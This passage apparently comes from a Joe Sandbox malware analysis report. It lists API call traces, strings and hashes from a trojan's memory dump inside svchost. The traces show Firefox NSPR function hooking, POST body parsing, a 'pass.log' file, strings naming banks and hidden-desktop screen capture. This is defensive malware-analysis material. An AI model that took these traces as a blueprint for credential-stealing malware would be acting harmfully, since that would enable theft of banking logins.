                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PR_SetError), ref: 02C7EF54
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 02C7EF61
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7622F550,00000000,7693BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88FF8
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: memcpy.MSVCRT(?,?,00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89020
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(00000000,?,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890B5
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(?,00000000,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890CA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Virtual$Protect$AllocLibraryLoadmemcpy
                                                                                                                                                                                                                    • String ID: PR_Close$PR_GetError$PR_GetNameForIdentity$PR_OpenTCPSocket$PR_Read$PR_SetError$PR_Write$nspr4.dll
                                                                                                                                                                                                                    • API String ID: 1577031324-943613760
                                                                                                                                                                                                                    • Opcode ID: e4b46da6d58aa288dc49034314960b9be425a9911dad82519c8391f5165aef91
                                                                                                                                                                                                                    • Instruction ID: 6d5524f4b433b16b8db29e1f5193a618bd92d53aeb5a8604d07816fc66f55455
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4b46da6d58aa288dc49034314960b9be425a9911dad82519c8391f5165aef91
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5017973BC536632B91336751C46FCB574D8EC1E48F0649B1F803B1944DBD5E1028879
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000C10,76233050,762330D0,76233080), ref: 02C83EC7
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C83ECA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83EDE
                                                                                                                                                                                                                    • inet_addr.WS2_32(?), ref: 02C83F05
                                                                                                                                                                                                                    • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C83F23
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83F2D
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C83F30
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83F3D
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C83F40
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 02C83F58
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C83F5F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83F6F
                                                                                                                                                                                                                    • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C83F85
                                                                                                                                                                                                                    • htons.WS2_32(00000000), ref: 02C83FB1
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02C83FE1
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C83FE4
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02C83FF4
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C83FF7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$AllocFreeTableValidatememset$htonsinet_addr
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1718479325-0
                                                                                                                                                                                                                    • Opcode ID: 29477025ae6a1fe9aa3d15dd92cb163b7405cb1b7ee00adbba94e1da104d29ae
                                                                                                                                                                                                                    • Instruction ID: b88085a35273208d51dc973e77e834283b74a67b41c9b3ff78c4246472cfc672
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29477025ae6a1fe9aa3d15dd92cb163b7405cb1b7ee00adbba94e1da104d29ae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0241E332E40294ABDB21AF65DC48F9A7B78EF80B09F0185D4FD0497280DB72DA45CBE1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C84060
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C8408C
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,0000001C,0000001C), ref: 02C840B3
                                                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000005), ref: 02C840E4
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C8410D
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,Content-Length: ), ref: 02C84125
                                                                                                                                                                                                                    • StrToIntA.SHLWAPI(-00000010), ref: 02C84133
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000004), ref: 02C84165
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$Readmemcpystrstr
                                                                                                                                                                                                                    • String ID: $Content-Length: $POST
                                                                                                                                                                                                                    • API String ID: 2509092961-2076583852
                                                                                                                                                                                                                    • Opcode ID: 98e3f5e6023505e43740f07631d97470b1c8b4de8df814408e7af2995d1372bf
                                                                                                                                                                                                                    • Instruction ID: 20fb5f77d205ca073ff0fd67f8c3b62ce2f308a28ed9b6ee4e61b5401f3d3b17
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98e3f5e6023505e43740f07631d97470b1c8b4de8df814408e7af2995d1372bf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6718071D40256AFDB24EFA8DC84BAEBBB9FF88704F108669E814E7640D7309914CF91
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8CBE1
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02C8CC19
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8CC4D
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8CC83
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(00000000,7F1BFC0D), ref: 02C8CCC9
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8A390,00000000,00000000,00000000), ref: 02C8CD48
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8CD60
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8CD71
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C8CD97
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,02C87A4D), ref: 02C8CDD4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashHandle$CloseCreateExistsFileInformationThreadmemcpymemsetstrstr
                                                                                                                                                                                                                    • String ID: 7F1BFC0D$<L>$POST$bsi.dll$pass.log
                                                                                                                                                                                                                    • API String ID: 4177962767-247644405
                                                                                                                                                                                                                    • Opcode ID: 9cc13a4ea0943cb3413a1a2afebb03ffea2db5b04c5cf6cf9bd6f23f5edbc480
                                                                                                                                                                                                                    • Instruction ID: 06d8eef77a4d09b74bfb68f91aa851fec4f1dbc0fe938ed8cc18d0de3af1fdc7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cc13a4ea0943cb3413a1a2afebb03ffea2db5b04c5cf6cf9bd6f23f5edbc480
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC516F31D406455BD716BF34EC097E67BA9EF85308F14865BD80897280EB709B58CFE0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8B8A7
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B8E1
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8B8EB
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8B8F3
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B904
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8B90B
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C8B941
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8B980
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D,?,?), ref: 02C8B9C7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashDirectoryErrorLast$AdminAttributesCreateCurrentFileFolderMakeSystemUser
                                                                                                                                                                                                                    • String ID: 7F1BFC0D$\$ctunnel.zip$path_ctunnel.txt
                                                                                                                                                                                                                    • API String ID: 2545201083-3302986162
                                                                                                                                                                                                                    • Opcode ID: 0d24fdd9394c81d2c3d99d38b0d80c5c5f2a43102a1a27a606cbdb373f676f99
                                                                                                                                                                                                                    • Instruction ID: d0a2208008877b16d15c25a98c7cfc1f1bfd6b29ceef1f59d470caa040ab772e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d24fdd9394c81d2c3d99d38b0d80c5c5f2a43102a1a27a606cbdb373f676f99
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A51F6309046598FDB16DF24A858BE6BBF9EF86308F14C6D4D8C9D7211DB70DA89CB90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetThreadDesktop.USER32(?), ref: 02C783E2
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: SelectObject.GDI32(00000000,00000000), ref: 02C77FCA
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: DeleteObject.GDI32(00000000), ref: 02C77FD9
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: DeleteDC.GDI32(00000000), ref: 02C77FE7
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: SelectObject.GDI32(?,00000000), ref: 02C77FF7
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: DeleteObject.GDI32(00000000), ref: 02C77FFF
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: DeleteDC.GDI32(?), ref: 02C78008
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: GetDC.USER32(00000000), ref: 02C7800C
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: CreateCompatibleDC.GDI32(00000000), ref: 02C7801B
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: CreateCompatibleDC.GDI32(00000000), ref: 02C78023
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C78044
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: SelectObject.GDI32(?,00000000), ref: 02C78053
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C7806E
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: SelectObject.GDI32(00000000,00000000), ref: 02C7808D
                                                                                                                                                                                                                      • Part of subcall function 02C77FB0: ReleaseDC.USER32(00000000,00000000), ref: 02C7809C
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 02C7840C
                                                                                                                                                                                                                    • GetTopWindow.USER32(00000000), ref: 02C7841B
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C78432
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000005), ref: 02C78448
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 02C7844B
                                                                                                                                                                                                                    • WindowFromPoint.USER32(?,?,00000000), ref: 02C7845F
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,?,00000005,00000000), ref: 02C78481
                                                                                                                                                                                                                    • GetIconInfo.USER32(?,?), ref: 02C7848D
                                                                                                                                                                                                                    • DrawIcon.USER32(00000000,00000000,?,?), ref: 02C784AE
                                                                                                                                                                                                                    • DestroyIcon.USER32(?,?,?,00000000), ref: 02C784B5
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 02C784C2
                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,00000000), ref: 02C784CF
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 02C784DB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Object$CompatibleCreateDeleteSelectWindow$Icon$BitmapReleaseSingleWait$DesktopDestroyDrawEventFromInfoMessageMutexPointSendSleepThread
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 2294845507-3387790918
                                                                                                                                                                                                                    • Opcode ID: 8eaec09d3a492f721f1fd1a2e24dbb4a57badda49ef832711eca34dd661be69c
                                                                                                                                                                                                                    • Instruction ID: 0e43117837ab6268a9a67490fb1ba952dea540b34f6c08637e1ff143d0f09b8b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8eaec09d3a492f721f1fd1a2e24dbb4a57badda49ef832711eca34dd661be69c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A313674A80341AFC616EBB4EC8DF1B7769EB88711F008F98F61587280DA74E921CB60
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}), ref: 02C91ADC
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C91AED
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B01
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C91B0F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C91960,00000000,00000000,00000000), ref: 02C91B24
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40), ref: 02C91B35
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C91B3A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B4E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C91B5C
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf95c), ref: 02C91B67
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bf95c,RSTYLE), ref: 02C91B81
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C91B8A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                    • String ID: 7f1bf95c$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$P0#v$RSTYLE
                                                                                                                                                                                                                    • API String ID: 505831200-2899104252
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C90B1C
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C90B2D
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B41
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C90B4F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C909A0,00000000,00000000,00000000), ref: 02C90B64
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40), ref: 02C90B75
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C90B7A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B8E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C90B9C
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf841), ref: 02C90BA7
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bf841,RAIFF), ref: 02C90BC1
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C90BCA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                    • String ID: 7f1bf841$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$P0#v$RAIFF
                                                                                                                                                                                                                    • API String ID: 505831200-2004234703
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 02C792BE
                                                                                                                                                                                                                      • Part of subcall function 02C7D200: GetWindowLongA.USER32(?,000000F0), ref: 02C7D21B
                                                                                                                                                                                                                      • Part of subcall function 02C7D200: GetLastActivePopup.USER32(?), ref: 02C7D229
                                                                                                                                                                                                                      • Part of subcall function 02C7D200: GetWindow.USER32(00000000,00000005), ref: 02C7D243
                                                                                                                                                                                                                      • Part of subcall function 02C7D200: GetWindow.USER32(00000000), ref: 02C7D246
                                                                                                                                                                                                                      • Part of subcall function 02C7D200: GetWindowInfo.USER32(00000000,?), ref: 02C7D25C
                                                                                                                                                                                                                      • Part of subcall function 02C7D200: GetWindow.USER32(00000000,00000004), ref: 02C7D265
                                                                                                                                                                                                                      • Part of subcall function 02C7D200: GetWindow.USER32(00000000,00000003), ref: 02C7D29E
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 02C792FF
                                                                                                                                                                                                                    • GetAncestor.USER32(00000000,00000002,00000000), ref: 02C79385
                                                                                                                                                                                                                    • SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?), ref: 02C793AC
                                                                                                                                                                                                                    • PostMessageA.USER32(00000000,00000020,00000000,00000001), ref: 02C793F1
                                                                                                                                                                                                                    • PostMessageA.USER32(00000000,00000000,00000000,00000001), ref: 02C79445
                                                                                                                                                                                                                      • Part of subcall function 02C79160: GetTickCount.KERNEL32 ref: 02C791EA
                                                                                                                                                                                                                      • Part of subcall function 02C79160: GetClassLongA.USER32(00000000,000000E6), ref: 02C7923D
                                                                                                                                                                                                                    • PostMessageA.USER32(00000000,00000112,?,?), ref: 02C794AE
                                                                                                                                                                                                                    • PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 02C794D9
                                                                                                                                                                                                                    • PostMessageA.USER32(00000000,0000007B,00000000,00000000), ref: 02C79555
                                                                                                                                                                                                                    • GetSystemMenu.USER32(00000000,00000000), ref: 02C79574
                                                                                                                                                                                                                    • GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 02C79598
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C79603
                                                                                                                                                                                                                    • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 02C79616
                                                                                                                                                                                                                    • PostMessageA.USER32(?,?,00000001,00000000), ref: 02C79639
                                                                                                                                                                                                                    • PostMessageA.USER32(?,?,00000002,00000000), ref: 02C7965B
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02C79693
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C796BD
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 590198697-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,02C7EAE2), ref: 02C7D6A7
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7D6AA
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D6B7
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7D6BA
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,02C7EAE2), ref: 02C7D6CA
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7D6CD
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D6DA
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7D6DD
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,02C7EAE2), ref: 02C7D6ED
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7D6F0
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D6FD
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7D700
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,02C7EAE2), ref: 02C7D710
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7D713
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D720
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7D723
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,?,00000000,?,00000000,02C7EAE2), ref: 02C7D75D
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7D760
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,?), ref: 02C7D76C
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7D76F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1670920773-0
                                                                                                                                                                                                                    • Opcode ID: 108202c0d4279456596ae13d8372c63828c1c486a485ed11bdd8f0e70d218377
                                                                                                                                                                                                                    • Instruction ID: 96d5c744759e76c387bd5157526568cf865ea02f85927ef851269706937036c1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 108202c0d4279456596ae13d8372c63828c1c486a485ed11bdd8f0e70d218377
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3731A172E843516BEB225F65AC88F5B77ACEFC0F56F090A19E40B93184DB31E910C6A0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetThreadDesktop.USER32(?,7622F590,762216B0,00000000), ref: 02C780BF
                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 02C780C7
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 02C780D8
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 02C780E9
